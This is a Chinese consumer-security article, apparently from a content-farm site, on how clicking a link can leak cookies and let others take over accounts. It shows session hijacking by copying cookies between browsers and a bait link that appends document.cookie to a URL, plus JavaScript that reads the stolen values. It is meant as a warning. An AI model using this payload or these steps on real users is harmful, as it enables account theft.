位置: IT常识 - 正文

点了下链接信息就泄露了,ta们是怎么做到的?(隐隐作痛怎么写)

编辑:rootadmin
原力计划点了下链接信息就泄露了,ta们是怎么做到的?

推荐整理分享点了下链接信息就泄露了,ta们是怎么做到的?(隐隐作痛怎么写),希望有所帮助,仅作参考,欢迎阅读内容。

文章相关热门搜索词:隐隐作痛怎么写,民国时期派克钢笔价格,民国时期派克钢笔价格,上海画家陆志文,社保换省不转的话就作废了么,坚美蓝光断桥,坚美蓝光断桥,上海画家陆志文,内容如对您有帮助,希望把文章链接给更多的朋友!

随着互联网的普及以及一系列可供上网设备的快速发展,截止2022年12月,中国网民规模达10.37亿,较之2021年12月增长3549万,互联网普及率达75.6%;在这么庞大的数据背后又有多少用户的个人信息被泄露呢?

一、信息泄露常见场景1.1 手机号码泄露导致的骚扰短信或电话1.2 不同的平台账号被盗后用于群发非法信息二、cookie2.1 什么是cookie2.2 登录及访问网站的流程2.3 如何跨浏览器使用cookie三、信息是如何泄露的?3.1 点击不明链接3.1 通过JS获取cookie3.2 从地址栏获取参数并进行截取一、信息泄露常见场景1.1 手机号码泄露导致的骚扰短信或电话

1.2 不同的平台账号被盗后用于群发非法信息

备注:图源网络

二、cookie2.1 什么是cookie

在介绍之前,我们首先需要了解什么是cookie,类型为“小型文本文件”,是某些网站为了辨别用户身份,进行Session跟踪而储存在用户本地终端上的数据(通常经过加密),由用户客户端计算机暂时或永久保存的信息。 举例来说, 一个 Web 站点可能会为每一个访问者产生一个唯一的ID, 然后以 Cookie 文件的形式保存在每个用户的机器上。如果使用浏览器访问 Web, 会看到所有保存在硬盘上的 Cookie。 在这个文件夹里每一个文件都是一个由“名/值”对组成的文本文件,另外还有一个文件保存有所有对应的 Web 站点的信息。在这里的每个 Cookie 文件都是一个简单而又普通的文本文件。透过文件名, 就可以看到是哪个 Web 站点在机器上放置了Cookie(当然站点信息在文件里也有保存) 。 所谓“cookie”数据是指某些网站为了辨别用户身份,储存在用户本地终端上的数据(通常经过加密),由用户客户端计算机暂时或永久保存的信息。 通俗来讲就是指缓存数据,包括用户名、密码、注册账户、手机号等公民个人信息。 介绍源自百科

2.2 登录及访问网站的流程

我们在接下来的流程演示中以百度为例。 场景如下:我昨天用百度APP浏览了一些我很感兴趣的内容,今天我在电脑上想再看一下,但是我并没有将那些网址记下来, (想必大家上网冲浪的时候也没有背诵网址的习惯吧) 那只能在这个新的终端通过登录并查看历史浏览记录才能达到这一效果了。

在谷歌浏览器访问百度发现处于未登录的状态,输入账号密码并点击登录,校验信息成功后会返回cookie并跳转或刷新页面。如下图即为登录流程以及成功后的页面显示

那么如何查看cookie呢? 在浏览器右击点击检查 点击上方的Application选项卡 点击左侧的Cookies栏目,即可查看浏览器的cookie信息 现在可以看到有百度的cookie的信息,它是通过不同的网站进行分类,Name列与Value列是类似于键值对的关系进行组合

cookie也看到了,那我现在想要访问一下我的个人中心,需要跳转页面才能实现,那这个过程是不是还需要再次登录呢?

很显然是不用的,这是因为服务器有检测到这个有效cookie,所以后续一系列的访问都会放行让我们顺利通关。 那么可想而知,这个信息如果被别人掌握了,是不是就意味着他们能冒充我们的身份呢? 大腿一拍:“坏了! 我成替身了!!”

点了下链接信息就泄露了,ta们是怎么做到的?(隐隐作痛怎么写)

2.3 如何跨浏览器使用cookie

市面上有着丰富的浏览器供用户选择使用,如:谷歌、火狐、Edge、等,但是不同的浏览器之间进行cookie的读取显然是不可行的,很简单的一个例子,现在我在百度登录了我的账号,那么我在火狐浏览器访问百度很明显是处于未登录的状态,因为不同的浏览器的cookie就是给各自的浏览器使用的

假设啊,这里我只是假设,假设你的对象截取到了你在谷歌浏览器的cookie并通过别的浏览器登录你的账号,ta该如何操作呢? 首先,ta在火狐浏览器鼠标右键点击检查,点击存储,点击cookie,在下方点击全部删除,将现有cookie清空

然后ta打开了你的谷歌浏览器右键检查,点击Application,点击cookie,将百度服务器返回给你cookie信息一条条复制过去; 当然也可以借助浏览器插件(cookie-editor)批量导出,放到文本编辑器中可以看到就是这种JSON格式的数据

在火狐浏览器同样安装这个插件,将数据复制过来,点击导入,然后刷新页面,可以看到在火狐浏览器没有进行什么账号密码的校验也登录成功了,那是不是意味着ta想干什么都可以呢

三、信息是如何泄露的?3.1 点击不明链接

这时候大家可能就会说了,我没有对象,没人来截取我的cookie。大话不要说太早,我们首先新建一个html文件,在里面放上一个a标签并写上一些很有诱惑力的语句,这样看上去是不是就很想点一下呢?

<a href="">猜你喜欢,点我有惊喜</a>3.1 通过JS获取cookie

我们先通过手动插入的方式给这个网址加入一些cookie,右击检查,选择Application、Cookies,在右侧双击即可添加cookie

随后点击Console选项卡,输入document.cookie,即可输出该网站的所有cookie信息

document.cookie

这时候我们再对上面的超链接修饰一下,跳转到别人用心的人部署的网站,并通过拼接地址栏参数的形式将cookie携带出去

<a href="javascript:location.href='http://www.baidu.com?'+document.cookie">猜你喜欢,点我有惊喜</a>3.2 从地址栏获取参数并进行截取

点击该超链接,可以在地址栏看到刚才我们在那个网址所添加的cookie信息都以参数的形式携带过来了

现在我们已经携带着自己的信息跳转到了别有用心的人的网站,ta如何通过JS获取地址栏参数呢

function GetQueryString(name){ var reg = new RegExp( "(^|&)" + name + "=([^&]*)(&|$)" ); var r = window.location.search.substr(1).match(reg); if (r!= null ) return unescape(r[2]); return null ;}// 调用方法alert(GetQueryString( "参数名1" ));

到了这一步可以说是已经无法挽回了,这也是你时常会收到骚扰电话、短信、盗号提醒的原因之一,希望大家在网上冲浪的时候守护好自己的个人信息

本文链接地址:https://www.jiuchutong.com/zhishi/292348.html 转载请保留说明!

上一篇:波来古市附近的Chu Dang Ya火山,越南嘉来 (© Quang Ngoc Nguyen/Alamy)(波来古市在哪里)

下一篇:【uni-app系列】uni-app之nvue使用(uni-app介绍)

  • 企业工商信息查询注册公司方法

    企业工商信息查询注册公司方法

  • iphone13快捷指令在哪(iphone13快捷指令nfc门禁卡)

    iphone13快捷指令在哪(iphone13快捷指令nfc门禁卡)

  • 抖音极速版压岁钱卡怎么集(抖音极速版128元上线)

    抖音极速版压岁钱卡怎么集(抖音极速版128元上线)

  • vivo x27手机电量百分比在哪设置(vivox21手机电量)

    vivo x27手机电量百分比在哪设置(vivox21手机电量)

  • 麒麟980和麒麟990的区别(麒麟980和麒麟9905g差距有多大)

    麒麟980和麒麟990的区别(麒麟980和麒麟9905g差距有多大)

  • 微信怎么不发信息知道对方删没有(微信怎么不发信息看好友是否把你删除)

    微信怎么不发信息知道对方删没有(微信怎么不发信息看好友是否把你删除)

  • Word快速访问工具栏在哪里(Word快速访问工具栏怎么恢复)

    Word快速访问工具栏在哪里(Word快速访问工具栏怎么恢复)

  • 闲鱼删除订单还显示评价吗(闲鱼删除订单还能恢复吗)

    闲鱼删除订单还显示评价吗(闲鱼删除订单还能恢复吗)

  • 优酷错误代码11020(优酷错误代码11010是什么意思)

    优酷错误代码11020(优酷错误代码11010是什么意思)

  • 手机没有红外功能怎么控制空调(手机没有红外功能怎么开空调)

    手机没有红外功能怎么控制空调(手机没有红外功能怎么开空调)

  • ipadmini2是哪年出的(ipadmini2是什么时候出的)

    ipadmini2是哪年出的(ipadmini2是什么时候出的)

  • 华为lra一al00是什么型号

    华为lra一al00是什么型号

  • 运算器由什么组成(运算器由什么组成部分)

    运算器由什么组成(运算器由什么组成部分)

  • 填充主题颜色怎么设置(主题填充彩色轮廓)

    填充主题颜色怎么设置(主题填充彩色轮廓)

  • 手机wps如何删除空白页(手机wps如何删除页眉横线)

    手机wps如何删除空白页(手机wps如何删除页眉横线)

  • ios13如何隐藏app(ios13.5怎么隐藏软件)

    ios13如何隐藏app(ios13.5怎么隐藏软件)

  • oppoa9x充电多少w(oppoa9手机充电多少w)

    oppoa9x充电多少w(oppoa9手机充电多少w)

  • 淘宝问大家怎么不显示(淘宝问大家怎么回答问题)

    淘宝问大家怎么不显示(淘宝问大家怎么回答问题)

  • airpods一代怎么切歌(airpods一代怎么配对新手机)

    airpods一代怎么切歌(airpods一代怎么配对新手机)

  • 苹果11手机能同时装几个卡(苹果11手机同步到新手机)

    苹果11手机能同时装几个卡(苹果11手机同步到新手机)

  • 手机多个摄像头的用处(手机多个摄像头怎么切换)

    手机多个摄像头的用处(手机多个摄像头怎么切换)

  • 荣耀9有人脸识别功能吗(荣耀有人脸识别怎么关机)

    荣耀9有人脸识别功能吗(荣耀有人脸识别怎么关机)

  • 为什么抖音发的视频别人看不到(为什么抖音发的照片不动了)

    为什么抖音发的视频别人看不到(为什么抖音发的照片不动了)

  • 京东账号在哪里看(京东账号在哪里买)

    京东账号在哪里看(京东账号在哪里买)

  • preparingautomaticrepair什么意思(preparingautomaticrepair然后无限重启)

    preparingautomaticrepair什么意思(preparingautomaticrepair然后无限重启)

  • 怎么判断苹果充电器是不是原装(怎么判断苹果充电线是不是原装)

    怎么判断苹果充电器是不是原装(怎么判断苹果充电线是不是原装)

  • 谈谈CentOS发布内核安全补丁:修复Meltdown和Spectre漏洞(centos停止发布)

    谈谈CentOS发布内核安全补丁:修复Meltdown和Spectre漏洞(centos停止发布)

  • 新爱尔兰岛上的蓝指海星,巴布亚新几内亚 (© Jurgen Freund/Minden Pictures)(爱尔兰新手岛)

    新爱尔兰岛上的蓝指海星,巴布亚新几内亚 (© Jurgen Freund/Minden Pictures)(爱尔兰新手岛)

  • 最小的电脑是什么(最小的电脑是多少寸的)

    最小的电脑是什么(最小的电脑是多少寸的)

  • 从价税是什么意思
  • 玉米大量收购
  • 个体户也要做实收资本吗
  • 基本户的利息和本金比例
  • 电子银行承兑重复背书
  • 个税申报和工资表不符
  • 收购农产品进项税抵扣税率是多少
  • 增值税销项税额影响入账金额吗
  • 应收银行存款利息怎么算
  • 所得税退税未办理可以注销吗?
  • 无实收资本能日本投资吗
  • 营改增后如何纳税
  • 安装工程劳务合同
  • 个人去税务局开劳务费税率
  • 增值税红字发票怎么做账
  • 无票收入有哪些情况抖音
  • 税收协助
  • 广告服务差额征税
  • 出差住宿费普票可以抵扣进项税吗为什么
  • 长期股权投资权益法初始计量
  • 财政性资金是不含税的吗
  • 物业公司哪些收费项目
  • 华为折叠手机mateXs
  • netframework4.8安装未成功
  • macos12支持设备
  • w11怎么更新
  • 一般纳税人接受固定资产投资时相关的科目可能有
  • win7系统咋样
  • 宏病毒感染的文件类型是什么
  • wordpress访客插件
  • php自学教程
  • 公司注销不清算可以吗
  • php实现的链式队列是什么
  • 解决的英文
  • 小企业遵循什么会计准则
  • gpt-3的功能
  • 用pullout造句
  • 业务招待费可以结转吗
  • 长期待摊费用的账务处理
  • mysql一对多关系如何一次性查出来
  • c语言fread函数的用法示例
  • 记账凭证填错了怎么办还没有登记账簿
  • 购入交易性金融资产的相关税费计入
  • 公司帐户转到法人帐户用途写备用金行吗
  • 高新补助收入属于不征税收入吗
  • 收到服务费发票怎么做账
  • 个人所得税的计算标准
  • 销售退回怎么办
  • 装修费用进什么科目
  • 财务费用为零的原因
  • 房地产储备土地排名
  • 增值税免抵退税和免退税的区别有什么?
  • 电费发票开据后如何入帐?
  • 发票报销可以跨月报销吗
  • 应收账款周转率范围多少合适
  • 什么服务费发票可以免税的
  • 公司的钱如何提出来
  • 计入福利费
  • centos crond
  • win10快速操作怎么调出来
  • linux ifcon
  • 升级win10系统后电脑变卡处理方法
  • netfilter/iptables模块编译及应用
  • vsftpd教程
  • cocos2dx入门
  • opengl 实现
  • javascript数组的应用
  • perl $?
  • qt搭建opencv
  • javascript面向对象编程
  • [置顶]游戏名 TentacleLocker
  • web前端开发工具哪个好
  • 浅谈python中的实例方法、类方法和静态方法
  • jquery的实现原理
  • unity 人物控制
  • 2020年上海税务跨区迁移很麻烦吗
  • 绿化工程项目
  • 个人的稿酬所得采用什么税率
  • 国税系统如何变更财务负责人
  • 2022年印花税最新规定反映了什么
  • 免责声明:网站部分图片文字素材来源于网络,如有侵权,请及时告知,我们会第一时间删除,谢谢! 邮箱:opceo@qq.com

    鄂ICP备2023003026号

    网站地图: 企业信息 工商信息 财税知识 网络常识 编程技术

    友情链接: 武汉网站建设